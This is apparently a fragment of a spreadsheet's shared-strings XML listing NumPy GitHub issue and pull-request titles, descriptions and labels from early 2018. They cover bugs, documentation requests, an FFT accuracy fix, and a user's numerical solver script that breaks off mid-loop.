  <si>
    <t>_x000D_
```python_x000D_
&gt;&gt;&gt; np.sum(a for a in range(10))_x000D_
45_x000D_
&gt;&gt;&gt; np.prod(a for a in range(10))_x000D_
&lt;generator object &lt;genexpr&gt; at 0x0000023BAF7ED1A8&gt;_x000D_
```_x000D_
_x000D_
Generators are not considered `array_like`, so the result for `sum` does not match the documentation._x000D_
_x000D_
Introduced in a13aad3ac33b629f3e696b4d4d5dbf4b5605d567</t>
  </si>
  <si>
    <t>DOC/BUG: np.sum supports generators, unlike the other reduction helpers</t>
  </si>
  <si>
    <t>```python_x000D_
&gt;&gt;&gt; class CanProd(object):_x000D_
...	def prod(self, axis, dtype, out): return "prod"_x000D_
_x000D_
&gt;&gt;&gt; np.product(CanProd())_x000D_
&lt;__main__.CanProd object at 0x0000023BAF7B29E8&gt;_x000D_
&gt;&gt;&gt; np.prod(CanProd())_x000D_
'prod'_x000D_
```_x000D_
_x000D_
We should probably deprecate one of these, or simply make them identical._x000D_
_x000D_
The docs already claim they are the same</t>
  </si>
  <si>
    <t>BUG: np.prod and np.product behave differently on duck-typed arrays</t>
  </si>
  <si>
    <t xml:space="preserve">I can't really share my build setup, but it's not windows like it usually is. I get the error:_x000D_
```_x000D_
numpy/core/src/multiarray/scalartypes.o: relocation R_X86_64_PC32 against `npy_longdouble_to_PyLong' can not be used when making a shared object; recompile with -fPIC_x000D_
```_x000D_
_x000D_
This looks like it was a bug I introduced in #9971. </t>
  </si>
  <si>
    <t>BUG: Relocation R_X86_64_PC32 against `npy_longdouble_to_PyLong' can not be used when making a shared object; recompile with -fPIC</t>
  </si>
  <si>
    <t>This command fails to make numpy build_x000D_
_x000D_
```_x000D_
python setup.py egg-info build install_x000D_
```_x000D_
_x000D_
But this works fine:_x000D_
_x000D_
```_x000D_
python setup.py egg-info_x000D_
python setup.py build_x000D_
python setup.py install_x000D_
```_x000D_
_x000D_
As the presence of `egg-info` causes builds to be skipped</t>
  </si>
  <si>
    <t>BUG: setup.py does not build if egg-info is specified</t>
  </si>
  <si>
    <t>['00 - Bug', 'component: build', 'component: distribution']</t>
  </si>
  <si>
    <t>Dear developers_x000D_
_x000D_
the official Python documentation has the very handy feature of a search field in its top navigation bar that allows you to perform a search directly within its documentation._x000D_
Could you implement something like that as well for your documentation as it is a very convenient feature?_x000D_
_x000D_
Regards,_x000D_
_x000D_
Jakob</t>
  </si>
  <si>
    <t>Please add Sphinx search field to numpy html docs</t>
  </si>
  <si>
    <t>['component: Documentation', 'good first issue']</t>
  </si>
  <si>
    <t>Update master after 1.14.1 release._x000D_
_x000D_
* Add `1.14.1-changelog.rst` file._x000D_
* Update `1.14.1-notes.rst.txt` file._x000D_
* Update `RELEASE_WALKTHROUGH.rst.txt`</t>
  </si>
  <si>
    <t>MAINT: Post 1.14.1 release updates for master branch</t>
  </si>
  <si>
    <t>As discussed in #5032: Adds an `initial` kwarg for `ufunc.reduce`, plus changes in `min`, `max`, `sum`, `prod`._x000D_
_x000D_
This acts as the first item in a reduction. It's useful for empty reductions e.g. `np.min([], initial=np.inf)` reduces to `inf`. It's also useful for starting the reduction with a different value e.g. `np.sum([10], initial=5)` reduces to `15`. (`5` used as starting value rather than the identity `0`)._x000D_
_x000D_
Explicitly passing the initial value as `None` causes empty reductions to err._x000D_
_x000D_
Explicitly passing `np._NoValue` also keeps the default behaviour._x000D_
_x000D_
`min`, `max`, `sum` and `prod` only pass on the `initial` kwarg._x000D_
_x000D_
`PyUFunc_Reduce` is modified to accept the `initial` kwarg. It then replaces the identity by `initial`._x000D_
_x000D_
Changes are made to `normalize_reduce_args` so that it accepts and parses `initial` correctly._x000D_
_x000D_
Documentation has been added for all the changes._x000D_
_x000D_
Fixes #5032</t>
  </si>
  <si>
    <t>ENH: Implement initial kwarg for ufunc.add.reduce</t>
  </si>
  <si>
    <t>ENH: Add fpspace function_x000D_
_x000D_
Hybrid of linspace and logspace based on floating-point space._x000D_
_x000D_
TST: Added tests for fpspace</t>
  </si>
  <si>
    <t>ENH: Add fpspace function</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;img width="337" alt="py1" src="https://user-images.githubusercontent.com/9477742/36406284-b8e3922c-15c3-11e8-952d-5a67a5c08146.PNG"&gt;_x000D_
&lt;img width="248" alt="py3" src="https://user-images.githubusercontent.com/9477742/36406286-bb97ce3e-15c3-11e8-98b0-cddfd0bb889e.PNG"&gt;_x000D_
_x000D_
When creating an array from 0.2 to 0.8, the maximum value in the array is 0.8, but when I run max of the whole array,  I found the maximum value different from 0.8. It has digits in the 15th and 16th decimal._x000D_
When the same is done with 0.7 as the ending value, the maximum of the array is 0.60000000009.. and the value of 0.7 is not included in the array._x000D_
_x000D_
PFA the screenshots._x000D_
</t>
  </si>
  <si>
    <t>np.arange: the initial and the ending value are different form the ones provided as argument</t>
  </si>
  <si>
    <t>* Update release notes._x000D_
* Create `1.14.1-changelog.rst`_x000D_
_x000D_
[skip ci]</t>
  </si>
  <si>
    <t>REL: Prepare for 1.14.1 release.</t>
  </si>
  <si>
    <t>['03 - Maintenance', '14 - Release']</t>
  </si>
  <si>
    <t>Second backport of #10621, including revert of the last one (#10622)</t>
  </si>
  <si>
    <t>BUG: deallocate recursive closure in arrayprint.py (backport try 2)</t>
  </si>
  <si>
    <t>The doc currently doesn't mention that `PyArray_GetField` steals a reference to its `descr` argument.</t>
  </si>
  <si>
    <t>PyArray_GetField() steals ref to descr</t>
  </si>
  <si>
    <t>The previous numpy FFT implementation did not provide the numerical constants with full double precision as it was a direct conversion of a single precision Fortran code. This commit fixes this and consequently improves accuracy. I took the constants from the DFFTPACK source code but checked them first using gmpy2._x000D_
_x000D_
Additionally, I took a look at the calculation of the twiddle factors `exp(2j*pi*n/m)` in the implementation and found that their accuracy could also be improved in two ways:_x000D_
_x000D_
- The integer fraction `m/n` can be reduced to the first octant `[1, 1/8]` prior to the multiplication with `2*pi`. Due to the symmetry of the exponential function, the values for all octants can be obtained by simple symmetry operations. This improves the accuracy of the twiddle factor as less accuracy is lost in the multiplication inside the argument._x000D_
- The twiddle factor can be calculated in extended precision when it is available. _x000D_
_x000D_
It turned out that the first option increases the accuracy substantially while having only a small performance impact. Doing the calculation in extended precision provides almost no further increase in accuracy but doubles the twiddle factor calculation time on my computer (Only for the first FFT, afterwards the twiddle factors are cached). Thus, the PR currently proposes to not use extended precision calculations -- but it can easily be changed. One could also argue that one usually cares about the runtime if FFTs of the same size are repeated very often. In this case the time for creating the twiddle factors would not really matter.  _x000D_
_x000D_
I did benchmarks on the accuracy and speed of the FFT implementations in numpy ("numpy-1.13.3", this PR with double precision "numpy-fixed-double", this PR with extended precision "numpy-fixed-extended"), scipy and pyfftw. The results are shown below, the code can be found in the following repo: https://github.com/Lodomir/benchmark-ffts_x000D_
_x000D_
## Accuracy_x000D_
![accuracy_complex](https://user-images.githubusercontent.com/9280511/36356235-2a65dab6-14ef-11e8-886a-0da82d50fae8.png)_x000D_
 _x000D_
Above is the forward error (L2 error) of a complex-valued double-precision FFT compared against a high-precision calculation of the DFT for several array sizes (power-of-two, regular numbers (prime factors &lt;= 5), primes). Additionally, the identity error, i.e., comparing `x` and `ifft(fft(x))` is shown for larger array sizes. One can see that the fixed numpy FFT performs even better than scipy (which uses DFFTPACK and is equivalent to numpy with accurate constants). It is also on par with FFTW except for primes sizes where the lack of a prime-size FFT and the use of a N^2-algorithm leads to large error propagation._x000D_
_x000D_
![accuracy_real](https://user-images.githubusercontent.com/9280511/36356266-ff1dc1f6-14ef-11e8-9cce-d3f900baa4c2.png)_x000D_
The same for real-valued FFTs. Curiosly, the FFTPACK implementation for non-factorizable inputs performs really bad here. We should propably document this._x000D_
_x000D_
## Speed_x000D_
The speed of the FFT itself is not impacted by the PR. However, the calculation of the twiddle factors is made slower due to the additional branching in front of the sin/cos computation. If we decide to use extended precision the performance impact depends on the math-library used. I tested this with the glibc-implementation which leads to a factor of two in the runtime for the twiddle factor calculation._x000D_
_x000D_
I tried to benchmark the twiddle factor creation time by measuring the runtime of the FFT and then destroying the FFT cache manually. _The runtime for twiddle factor calculation is the difference between the non-cached FFT run and the cached one!_ _x000D_
_x000D_
![speed_complex](https://user-images.githubusercontent.com/9280511/36356306-97ba9024-14f0-11e8-9cdb-effabb19fdf2.png)_x000D_
The results for complex-valued FFTs._x000D_
_x000D_
![speed_real](https://user-images.githubusercontent.com/9280511/36356313-a0637bf0-14f0-11e8-8655-4a97d376023e.png)_x000D_
The results for real-valued FFTs._x000D_
_x000D_
PS: I realize just now that I forgot reading the conventions on commit messages and the C code. Sorry for that and hopefully I was not too far off... I will fix it when I have time.</t>
  </si>
  <si>
    <t>BUG: Improve the accuracy of the FFT implementation</t>
  </si>
  <si>
    <t>['00 - Bug', '03 - Maintenance', 'component: numpy.fft']</t>
  </si>
  <si>
    <t>Backport of #10623._x000D_
_x000D_
When parsing dtype strings, we should only consider them to_x000D_
be comma seperated if there are commas not present in a_x000D_
pair of square brackets._x000D_
_x000D_
Whilst we had a check for this already in the code there was_x000D_
an off by 1 bug where we failed to consider the first character_x000D_
of the string. This would lead to an infinite recursion when_x000D_
trying to parse strings of the form `[i8,f8]`._x000D_
_x000D_
Fixes: #10440</t>
  </si>
  <si>
    <t>BUG: Correctly identify comma separated dtype strings</t>
  </si>
  <si>
    <t>When parsing dtype strings, we should only consider them to_x000D_
be comma seperated if there are commas not present in a_x000D_
pair of square brackets._x000D_
_x000D_
Whilst we had a check for this already in the code but there was_x000D_
an off by 1 bug where we failed to consider the first character_x000D_
of the string. This would lead to an infinite recursion when_x000D_
trying to parse strings of the form `[i8,f8]`._x000D_
_x000D_
Fixes: #10440</t>
  </si>
  <si>
    <t>BUG: Correctly identify comma seperated dtype strings</t>
  </si>
  <si>
    <t>Fixes #10620 _x000D_
Backport of  #10621</t>
  </si>
  <si>
    <t>BUG: deallocate recursive closure in arrayprint.py (1.14 backport)</t>
  </si>
  <si>
    <t>Fixes #10620</t>
  </si>
  <si>
    <t>BUG: deallocate recursive closure in arrayprint.py</t>
  </si>
  <si>
    <t>&gt; Special cases aren't special enough to break the rules._x000D_
_x000D_
The nomask case did not match the documented return value of a list._x000D_
_x000D_
The semantics of returning None instead of an empty list seems stupid to me, but it's out of scope for this fix._x000D_
_x000D_
A quick search finds  [this code](https://losc.ligo.org/s/sample_code/dq.py), which would be broken on perfect data before this patch.</t>
  </si>
  <si>
    <t>BUG: np.ma.flatnotmasked_contiguous behaves differently on mask=nomask and mask=zeros</t>
  </si>
  <si>
    <t>['00 - Bug', 'component: numpy.ma']</t>
  </si>
  <si>
    <t>By not using this type of indexing, it becomes easier for subclasses to override indexing in a way that works correctly with numpy functions._x000D_
_x000D_
These locations were found by deprecating the behavior in question, which is deliberately not part of this commit_x000D_
_x000D_
Split out from #9686. @mhvk requested further cleanup there, but I'd rather just get the fix in first with a minimal diff</t>
  </si>
  <si>
    <t>MAINT: Stop using non-tuple indices internally</t>
  </si>
  <si>
    <t xml:space="preserve">Backport  of  #10381._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>BUG/ENH: Improve output for structured non-void types</t>
  </si>
  <si>
    <t>['00 - Bug', '01 - Enhancement', '08 - Backport', 'component: numpy.core']</t>
  </si>
  <si>
    <t>Backport of #10477._x000D_
_x000D_
See gh-10451 for issue._x000D_
_x000D_
_x000D_
* Align type definitions_x000D_
_x000D_
* Regenerate sources_x000D_
_x000D_
* Replace BytesIO_x000D_
_x000D_
* Consolidate executables_x000D_
_x000D_
* Create directories on PY2_x000D_
_x000D_
* Revise step name_x000D_
_x000D_
* Consolidate directory creation_x000D_
_x000D_
* Don't catch makedirs errors_x000D_
_x000D_
* Revise step name_x000D_
_x000D_
* Add header source</t>
  </si>
  <si>
    <t xml:space="preserve">BUG: Align type definition with generated lapack </t>
  </si>
  <si>
    <t>['00 - Bug', '08 - Backport', 'component: numpy.linalg']</t>
  </si>
  <si>
    <t>Fixes #10360, using @mhvk's suggestion.</t>
  </si>
  <si>
    <t>BUG: infinite recursion in str of 0d subclasses</t>
  </si>
  <si>
    <t>The optimization was to sort integer subarrays by treating them as_x000D_
strings of unsigned bytes. That worked fine for finding the unique_x000D_
subarrays, but the sort order of the results could be unexpected._x000D_
_x000D_
Closes #10495.</t>
  </si>
  <si>
    <t>BUG: Revert sort optimization in np.unique.</t>
  </si>
  <si>
    <t xml:space="preserve">Update to numpydoc v0.7.0, needed for sphinx 1.7.0 released 2/12/2018._x000D_
_x000D_
This PR also disables the `doc_note` function in `numpy/ma/core.py`. Currently, that function is called to add a "Notes" section to the existing docstrings of the unmasked versions of some functions, which may _x000D_
result in duplicate "Notes" sections, or incorrect placement. Those raise errors in current numpydoc._x000D_
</t>
  </si>
  <si>
    <t>MAINT: Update sphinxext submodule hash.</t>
  </si>
  <si>
    <t xml:space="preserve">The `check_roots` function in numpy/polynomial/tests/test_classes.py was_x000D_
using random numbers without a seed to generate the random roots to be_x000D_
checked. This made the test sensitive to the random state, with the_x000D_
result that currently two of the roots are close together and fail the_x000D_
test to the default seven digit precision when running on the Mac.  The_x000D_
failure is probably due to a combination of library and compiler_x000D_
differences between the Mac and the other platforms tested.. The fix_x000D_
here is to hard wire the test values rather than use random numbers._x000D_
_x000D_
This should fix the nightly wheel build test failures, but we won't know until they_x000D_
are run after merging._x000D_
</t>
  </si>
  <si>
    <t>MAINT: Do not use random roots when testing roots.</t>
  </si>
  <si>
    <t>['03 - Maintenance', '05 - Testing', 'component: numpy.polynomial']</t>
  </si>
  <si>
    <t>Found via `codespell -q 3 -I ../numpy-whitelist.txt`  
Whitelist consists of:  
```
amin
ans
behaviour
cancellation
dum
initialise
ith
nd
ot
splitted
writeable
```</t>
  </si>
  <si>
    <t>MAINT: Fix Misc. typos</t>
  </si>
  <si>
    <t xml:space="preserve">Improve error message for nan in histogram when range is not given_x000D_
_x000D_
Fixes #10601 </t>
  </si>
  <si>
    <t>MAINT: Improve error message in histogram.</t>
  </si>
  <si>
    <t>Doing proper error checking of string concatenation in python super tedious._x000D_
As a results, we're not doing it, making us prone to exceptions turning into segfaults._x000D_
This moves all of the `__str__` and `__repr__ `functions, where speed is irrelevant, into np.core._dtype._x000D_
_x000D_
---_x000D_
_x000D_
Minimal refactors made during the conversion from C - mainly just using `str.join` instead of manual loops. I'm sure more could be done here, but now that's it's python it should be easier for new contributors to modify._x000D_
_x000D_
CircleCI failures are because this is working off an earlier branch point</t>
  </si>
  <si>
    <t>MAINT: Move dtype string functions to python</t>
  </si>
  <si>
    <t xml:space="preserve">If one tries to do `np.histogram([1,2,3,4,np.nan])`, then an error message is thrown:_x000D_
`ValueError: range parameter must be finite.`_x000D_
_x000D_
This message is somewhat confusing, because I had to open up the source code of `histogram` to see that `mn` and `mx`, which were determined from `a.min()` and `a.max()`, were NaN because of NaN's in the input data._x000D_
_x000D_
Is it possible to change it to something like "input data contains NaN, which is not supported"?_x000D_
_x000D_
Python version: 3.6_x000D_
numpy version: 1.13.3_x000D_
</t>
  </si>
  <si>
    <t>np.histogram gives confusing error message when NaN is encountered</t>
  </si>
  <si>
    <t>['01 - Enhancement', '04 - Documentation', 'component: numpy.lib']</t>
  </si>
  <si>
    <t>It now works for lists and other numpy-convertible input._x000D_
_x000D_
Fixes #10598.</t>
  </si>
  <si>
    <t>ENH: Make flatnonzero call asanyarray before ravel()</t>
  </si>
  <si>
    <t>Thus, it fails for lists and such:_x000D_
_x000D_
    &gt;&gt;&gt; np.flatnonzero([1,2,3])_x000D_
    Traceback (most recent call last):_x000D_
      File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
      File ".../python3.6/site-packages/numpy/core/numeric.py", line 859, in flatnonzero_x000D_
        return a.ravel().nonzero()[0]_x000D_
    AttributeError: 'list' object has no attribute 'ravel'</t>
  </si>
  <si>
    <t>np.flatnonzero doesn't cast to ndarray</t>
  </si>
  <si>
    <t>I suspect this is related to the recent release of sphinx 1.7.0 on 2/12/2018. We may need to update the submodule hash for sphinxext, or maybe even fix numpydoc.</t>
  </si>
  <si>
    <t>The circleci test is broken.</t>
  </si>
  <si>
    <t>Fails on my machine, hoping for better diagnostics from travis</t>
  </si>
  <si>
    <t>WIP: Move dtype.__repr__ and __str__ to python</t>
  </si>
  <si>
    <t>['03 - Maintenance', '55 - Needs work', 'component: numpy.core']</t>
  </si>
  <si>
    <t>… #9088, and all of #10572</t>
  </si>
  <si>
    <t>DOC: Corrected url for Guide to NumPy book; see part of #8520, all of…</t>
  </si>
  <si>
    <t>PR for #10183 _x000D_
@eric-wieser CircleCI seems to fail due to an Extension-Error. Any idea what might have caused this?</t>
  </si>
  <si>
    <t>ENH: Add histogram_bin_edges function and test</t>
  </si>
  <si>
    <t>BUG: fix entry_points typo for from-template</t>
  </si>
  <si>
    <t>I just noticed in the docs that the page for `numpy.random.sample` indicates that the function should be called as `numpy.random.random_sample`. I understand that this may just indicate that the function may be called as either `sample` or `random_sample`, but it does come across as a mistake when first viewing the page. Perhaps make it more explicit that `random_sample` is an alias of `sample`? Or is this the accepted practice for functions that have aliases?</t>
  </si>
  <si>
    <t>DOC: numpy.random.sample and numpy.random.random_sample</t>
  </si>
  <si>
    <t>The [`unravel_index()`](https://docs.scipy.org/doc/numpy/reference/generated/numpy.unravel_index.html) function takes an argument named `dims` that corresponds to:_x000D_
_x000D_
&gt; The **shape** of the array to use for unraveling `indices`._x000D_
_x000D_
It seems like in most other places, this argument would be named `shape`, so I propose to rename it to match that convention, unless there is some special reason for this name to be different.</t>
  </si>
  <si>
    <t>`unravel_index()` argument name `dims` is not consistent with other functions</t>
  </si>
  <si>
    <t>In https://docs.scipy.org/doc/numpy/reference/c-api.types-and-structures.html#c.PyArray_Descr, the `names` field in the C `PyArray_Descr` struct is undocumented.</t>
  </si>
  <si>
    <t>PyArray_Descr.names undocumented</t>
  </si>
  <si>
    <t>['04 - Documentation', 'component: numpy.dtype']</t>
  </si>
  <si>
    <t>I'm seeing weird behaviour on two MacBooks Pro compared with my colleague's MacBook Pro._x000D_
_x000D_
On my first Mac, running High Sierra 10.13.3, IPython 5.3.0, numpy 1.11.0, and Python 2.7.13, installed using Anaconda:_x000D_
```_x000D_
In [2]: P01 = np.array([-13.73046875, -10.4140625 ,  18.88452148], dtype=np.float32)_x000D_
In [3]: P02 = np.array([-17.63671875,  13.19140625,  18.57519531], dtype=np.float32)_x000D_
In [4]: P03 = np.array([  3.30859375,   1.1015625 ,  30.3034668 ], dtype=np.float32)_x000D_
In [5]: np.dot(P02, np.cross(P01,P03))_x000D_
Out[5]: 0.0_x000D_
```_x000D_
_x000D_
On my second Mac, running High Sierra 10.13.3, IPython 5.4.1, numpy 1.13.3, and Python 2.7.14, installed using Anaconda:_x000D_
```_x000D_
In [1]: P01 = np.array([-13.73046875, -10.4140625 ,  18.88452148], dtype=np.float32)_x000D_
In [2]: P02 = np.array([-17.63671875,  13.19140625,  18.57519531], dtype=np.float32)_x000D_
In [3]: P03 = np.array([  3.30859375,   1.1015625 ,  30.3034668 ], dtype=np.float32)_x000D_
In [4]: np.dot(P02, np.cross(P01,P03))_x000D_
Out[4]: 0.0_x000D_
```_x000D_
_x000D_
On my colleague's Mac, running High Sierra 10.13.3, IPython 5.4.1, numpy 1.13.1, and Python 2.7.13, installed **not** using Anaconda:_x000D_
```_x000D_
In [8]: P01 = np.array([-13.73046875, -10.4140625 ,  18.88452148], dtype=np.float32)_x000D_
In [9]: P02 = np.array([-17.63671875,  13.19140625,  18.57519531], dtype=np.float32)_x000D_
In [10]: P03 = np.array([  3.30859375,   1.1015625 ,  30.3034668 ], dtype=np.float32)_x000D_
In [12]: np.dot(P02, np.cross(P01,P03))_x000D_
Out[12]: 12604.703_x000D_
```_x000D_
_x000D_
On my Mac, running High Sierra 10.13.3, **not using IPython**, numpy 1.13.1, and Python 2.7.14, installed using Anaconda:_x000D_
```_x000D_
&gt;&gt;&gt; P01 = np.array([-13.73046875, -10.4140625 ,  18.88452148], dtype=np.float32)_x000D_
&gt;&gt;&gt; P02 = np.array([-17.63671875,  13.19140625,  18.57519531], dtype=np.float32)_x000D_
&gt;&gt;&gt; P03 = np.array([  3.30859375,   1.1015625 ,  30.3034668 ], dtype=np.float32)_x000D_
&gt;&gt;&gt; np.dot(P02, np.cross(P01,P03))_x000D_
12604.703_x000D_
```_x000D_
_x000D_
I have checked that `np.__path__` and `np.__config__.show()` are the same in my IPython and Python interactive shells; they are. My colleague can get `np.dot` to work as expected (the `12604` result) on every machine he's tried. How do I go about debugging this? What might be happening?</t>
  </si>
  <si>
    <t>np.dot returning zero with np.float32, but not with the same arrays with dtype np.float64, and not on all machines/shells</t>
  </si>
  <si>
    <t>['57 - Close?', 'component: numpy.core']</t>
  </si>
  <si>
    <t>extra_compile_f90_args -&gt; extra_f90_compile_args</t>
  </si>
  <si>
    <t>MAINT: Fix typos in DISTUTILS.rst.txt.</t>
  </si>
  <si>
    <t xml:space="preserve">I have two "similar" arrays of arrays, but for the first one it works ok, but for the second one I get an error._x000D_
_x000D_
This is ok._x000D_
```_x000D_
np.random.choice([_x000D_
    [2, 54, 7049, 6914, 8513, 54, 777, 4016, 3998, 5822, 3097, 54, 5612, 249, 8052, 0],_x000D_
    [2, 54, 4558, 525, 5155, 7049, 8284, 6939, 249, 6912, 5770, 0],_x000D_
    [2, 54, 5566, 5822, 3097, 54, 5585, 5155, 6916, 3885, 7804, 7049, 0],_x000D_
    [2, 54, 3519, 7298, 5155, 6939, 3885, 7804, 7049, 0],_x000D_
    [2, 4558, 5155, 1967, 1868, 6939, 7669, 54, 949, 0]_x000D_
])_x000D_
_x000D_
[2, 54, 3519, 7298, 5155, 6939, 3885, 7804, 7049, 0]_x000D_
```_x000D_
_x000D_
But that one no._x000D_
```_x000D_
np.random.choice([_x000D_
    [2, 54, 3484, 5127, 3520, 6898, 5254, 54, 1724, 4316, 0],_x000D_
    [2, 4697, 2375, 8068, 3885, 7804, 159, 5155, 7808, 6903, 0],_x000D_
    [2, 7846, 929, 330, 6902, 249, 4079, 5129, 54, 8439, 0],_x000D_
    [2, 7846, 8746, 4697, 4079, 7808, 6903, 5129, 54, 4316, 0],_x000D_
    [2, 6675, 4697, 8572, 330, 5556, 8068, 5155, 54, 6898, 0]_x000D_
])_x000D_
_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
  File "mtrand.pyx", line 1106, in mtrand.RandomState.choice (numpy/random/mtrand/mtrand.c:17109)_x000D_
ValueError: a must be 1-dimensional_x000D_
```_x000D_
_x000D_
I don't see any real difference between them to get this exception, except all subarrays in the second case have **equal length**._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ENH: allow inconsistencies with `np.random.choice` via axis kwarg</t>
  </si>
  <si>
    <t>MAINT: Fix misc. documentation typos</t>
  </si>
  <si>
    <t xml:space="preserve">Implementing a numerical scheme of ETDRK4, published in SIAM J.S.C in 2005, cited over 600 times. Trefethen is the God in spectral method. So the algorithm is in high trust. Matlab code is directly in the paper. So there should be no issue with the matlab code. Python code is what I copied from matlab and did some grammar correction. It is also proved to be match perfect. I did numerous sanity checks. _x000D_
_x000D_
Matlab gives me stable result._x000D_
Scipy.fftpack gives me stable result._x000D_
**Numpy.fft gives me blow up.**_x000D_
_x000D_
See the post here (full code is contained in that post ):_x000D_
https://www.linkedin.com/pulse/weird-behavior-numpyfft-solving-chaotic-system-shaowu-shawn-pan/_x000D_
_x000D_
The code with postprocessing is given below. Very short. Trust me._x000D_
_x000D_
```_x000D_
#######################################################################_x000D_
#_x000D_
# Showing the difference between numpy.fft and scipy.fft_x000D_
#_x000D_
# Author: Shaowu Pan_x000D_
#_x000D_
# Date: 02/11/2018_x000D_
# _x000D_
#######################################################################_x000D_
_x000D_
# import numpy and pyplot_x000D_
import numpy as np_x000D_
from matplotlib import pyplot as plt_x000D_
import sys_x000D_
_x000D_
# try to import numpyr or scipy fft based on argv_x000D_
if sys.argv[1] == 'numpy':_x000D_
    ## choose numpy_x000D_
    from numpy.fft import fft,ifft_x000D_
else:_x000D_
    # choose scipy_x000D_
    from scipy.fftpack import fft, ifft_x000D_
_x000D_
_x000D_
# define constant_x000D_
pi = np.pi_x000D_
_x000D_
# viscosity_x000D_
nu = 1_x000D_
_x000D_
# mesh_x000D_
mesh = 128_x000D_
_x000D_
# time restriction_x000D_
tot = 30_x000D_
_x000D_
# distributed x point_x000D_
x = np.linspace(0, 2.0 * pi, mesh, endpoint=False)_x000D_
_x000D_
# force IC_x000D_
u0 = np.cos(x)*(1.0 + np.sin(x))_x000D_
_x000D_
# set up mesh grid and k array_x000D_
N = mesh_x000D_
k_array_noshift = np.fft.fftfreq(mesh)*mesh_x000D_
_x000D_
# set up initial condition_x000D_
u = u0_x000D_
v = fft(u)_x000D_
_x000D_
# time step_x000D_
h = 0.01_x000D_
_x000D_
## follow them, set -N/2 to zer_x000D_
k_array_noshift[mesh / 2] = 0_x000D_
_x000D_
## Linear part in fourier space_x000D_
L = 1.0/16.0*k_array_noshift**2 - nu*1.0/16.0**3 * k_array_noshift**4_x000D_
_x000D_
## Fourier mulitplier_x000D_
E = np.exp(h * L)_x000D_
E2 = np.exp(h * L / 2.0)_x000D_
_x000D_
## select number of points on the circle_x000D_
M = 16_x000D_
_x000D_
## choose radius 1, since k^2-k^4 ranges a lot... so 1 is enough to make sure only one singular point_x000D_
r = np.exp(1j * np.pi * (np.arange(1, M + 1) - 0.5) / M)_x000D_
r = r.reshape(1, -1)_x000D_
r_on_circle = np.repeat(r, mesh, axis=0)_x000D_
_x000D_
## define hL on M copies_x000D_
LR = h * L_x000D_
LR = LR.reshape(-1, 1)_x000D_
LR = np.repeat(LR, M, axis=1)_x000D_
_x000D_
## obtain hL on circle_x000D_
LR = LR + r_on_circle_x000D_
_x000D_
## important quantites used in ETDRK4_x000D_
_x000D_
# g = -0.5*i*k_x000D_
g = -0.5j * k_array_noshift_x000D_
_x000D_
# averaged Q, f1,f2,f3_x000D_
Q = h*np.real(np.mean( (np.exp(LR/2.0)-1)/LR, axis=1 ))_x000D_
_x000D_
f1 = h*np.real(np.mean( (-4.0-LR + np.exp(LR)*(4.0-3.0*LR+LR**2))/LR**3, axis=1 ))_x000D_
_x000D_
f2 = h*np.real(np.mean( (2.0+LR + np.exp(LR)*(-2.0 + LR))/LR**3, axis=1 ))_x000D_
_x000D_
f3 = h*np.real(np.mean( (-4.0-3.0*LR - LR**2 + np.exp(LR)*(4.0 - LR))/LR**3, axis=1 ))_x000D_
_x000D_
_x000D_
def compute_u2k_zeropad_dealiased(uk_):_x000D_
    """_x000D_
    3/2 zero padding de-aliasing_x000D_
    """_x000D_
    # u2k = fft(np.real(ifft(uk_))**2)_x000D_
    # three over two law_x000D_
    N = uk_.size_x000D_
_x000D_
    # map uk to uk_fine_x000D_
_x000D_
    uk_fine = np.hstack((uk_[0:N / 2], np.zeros((N / 2)), uk_[-N / 2:])) * 3.0 / 2.0_x000D_
_x000D_
    # convert uk_fine to physical space_x000D_
    u_fine = np.real(ifft(uk_fine))_x000D_
_x000D_
    # compute square_x000D_
    u2_fine = np.square(u_fine)_x000D_
_x000D_
    # compute fft on u2_fine_x000D_
    u2k_fine = fft(u2_fine)_x000D_
_x000D_
    # convert u2k_fine to u2k_x000D_
    u2k = np.hstack((u2k_fine[0:N / 2], u2k_fine[-N / 2:])) / 3.0 * 2.0_x000D_
_x000D_
    return u2k_x000D_
_x000D_
_x000D_
print 'dt =', h_x000D_
_x000D_
# np.linalg.norm(np.fft.ifft(uk_0)-u0) # very good_x000D_
_x000D_
ntsnap = int(tot/h)_x000D_
isnap = 0_x000D_
tsnap = np.linspace(0, tot, ntsnap)_x000D_
usnap = np.zeros((mesh, ntsnap))_x000D_
uksnap = np.zeros((mesh, ntsnap),dtype=complex)_x000D_
_x000D_
aasnap = np.zeros((mesh, ntsnap),dtype=complex)_x000D_
bbsnap = np.zeros((mesh, ntsnap),dtype=complex)_x000D_
ccsnap = np.zeros((mesh, ntsnap),dtype=complex)_x000D_
_x000D_
Nvsnap = np.zeros((mesh, ntsnap),dtype=complex)_x000D_
Nasnap = np.zeros((mesh, ntsnap),dtype=complex)_x000D_
Nbsnap = np.zeros((mesh, ntsnap),dtype=complex)_x000D_
Ncsnap = np.zeros((mesh, ntsnap),dtype=complex)_x000D_
_x000D_
_x000D_
tcur = 0.0_x000D_
_x000D_
## main loop time stepping_x000D_
while tcur &lt;= tot and isnap &lt; ntsnap:_x000D_
_x000D_
    # print tcur_x000D_
_x000D_
    # record snap_x000D_
    # if abs(tcur - tsnap[isnap]) &lt; 1e-2:_x000D_
    # print ' current progress =', tcur / tsnap[-1] * 100, ' % '_x000D_
    u = np.real(ifft(v))_x000D_
    usnap[:, isnap] = u_x000D_
    uksnap[:, isnap] = v_x000D_
_x000D_
    # Nv = g * fft(np.real(ifft(v))**2)_x000D_
    Nv = g * compute_u2k_zeropad_dealiased(v)_x000D_
_x000D_
    a = E2 * v + Q * Nv_x000D_
_x000D_
    # Na = g * fft(np.real(ifft(a))**2)_x000D_
    Na = g * compute_u2k_zeropad_dealiased(a)_x000D_
_x000D_
    b = E2 * v + Q * Na_x000D_
_x000D_
    # Nb = g * fft(np.real(ifft(b))**2)_x000D_
    Nb = g * compute_u2k_zeropad_dealiased(b)_x000D_
_x000D_
    c = E2 * a + Q * (2.0*Nb - Nv)_x000D_
_x000D_
    # Nc = g * fft(np.real(ifft(c))**2)_x000D_
    Nc = g * compute_u2k_zeropad_dealiased(c)_x000D_
_x000D_
    v = E*v + Nv*f1 + 2.0*(Na + Nb)*f2 + Nc*f3_x000D_
_x000D_
    aasnap[:, isnap] = a_x000D_
    bbsnap[:, isnap] = b_x000D_
    ccsnap[:, isnap] = c_x000D_
